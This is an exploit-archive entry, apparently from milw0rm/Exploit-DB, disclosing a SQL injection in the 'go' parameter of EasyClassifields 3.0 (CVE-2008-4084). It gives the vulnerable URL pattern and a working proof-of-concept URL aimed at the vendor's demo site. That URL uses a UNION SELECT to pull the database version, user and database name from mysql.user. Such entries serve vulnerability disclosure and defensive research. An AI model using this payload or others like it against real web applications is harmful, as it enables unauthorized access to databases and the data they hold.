EasyClassifields 3.0 - 'go' SQL Injection
Author: e.wiZz!
type: webapps
platform: php
port:
date_added: 2008-08-31
date_updated: 2016-12-21
verified: 1
codes: OSVDB-47859;CVE-2008-4084
tags:
aliases:
screenshot_url:
application_url:
##############EasyClassifields v3.0 SQL Injection#######################
####By: e.wiZz!
####Info: Bosnian Idiot FTW!
####Site: infected.blogger.ba
####Greetz: Luigi,suN8Hclf,str0ke
In the wild...
##################################################################
###Script Site: http://myiosoft.com/?1.6.0.0
###Vulnerability:
http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=<sql>
PoC on demo site:
http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user
# milw0rm.com [2008-09-01]